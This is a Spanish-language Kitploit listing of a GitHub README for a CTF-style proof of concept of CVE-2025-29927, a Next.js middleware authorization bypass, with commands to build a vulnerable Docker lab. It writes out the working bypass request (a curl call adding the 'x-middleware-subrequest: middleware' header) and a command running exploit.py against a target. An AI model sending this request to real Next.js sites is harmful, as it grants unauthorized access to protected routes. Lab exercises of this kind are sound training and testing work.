Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-29927 | Kitploit
Herramientas/GitHubGitHub/mhamzakhattak/cve-2025-29927
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-29927 - Bypass de Autorización del Middleware de Next.js (PoC)

Este es un PoC estilo Capture The Flag (CTF) para la vulnerabilidad de Bypass de Autorización del Middleware de Next.js (CVE-2025-29927). El objetivo es evadir el middleware de autenticación y recuperar la bandera de la ruta /protected.


Resumen de la Vulnerabilidad

  • CVE: CVE-2025-29927
  • Tipo: Bypass de Autorización
  • Componente: Middleware de Next.js
  • Impacto: Acceso no autorizado a rutas protegidas
  • Ruta Objetivo del PoC: /protected
  • Comportamiento Esperado: Los usuarios no autorizados son redirigidos a /
  • Comportamiento Vulnerable: El uso de una solicitud manipulada permite evadir la redirección y acceder directamente al contenido protegido

Configuración del PoC

1. Clonar el Repositorio

root@kitploit:~
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. Compilar y Ejecutar la Aplicación Vulnerable

root@kitploit:~
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

Esto iniciará la aplicación Next.js vulnerable en http://IP:3000


Explotación

1. Sin Explotación

Intenta acceder:

root@kitploit:~
curl -i http://IP:3000/protected

Serás redirigido a /.

root@kitploit:~
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. Con Explotación

Usa el exploit.py proporcionado para evadir el middleware y acceder a la ruta protegida:

root@kitploit:~
python3 exploit.py -url http://IP:3000

Si tiene éxito, recuperarás la bandera de /protected.


Archivos

  • Dockerfile - Compila la aplicación Next.js vulnerable
  • exploit.py - Explota la vulnerabilidad para evadir la autenticación
  • pages/ - Contiene las rutas vulnerables /protected y /login
  • middleware.js - La lógica vulnerable del middleware
  • README.md - Este archivo

Aviso Legal

Este PoC es solo con fines educativos y de investigación. No lo uses contra sistemas que no poseas o para los cuales no tengas permiso explícito de prueba.


🏁 Bandera

Encuentra la bandera explotando la vulnerabilidad y accediendo a:

root@kitploit:~
http://IP:3000/protected

¡Buena suerte! 🏴‍☠️

Descargar herramienta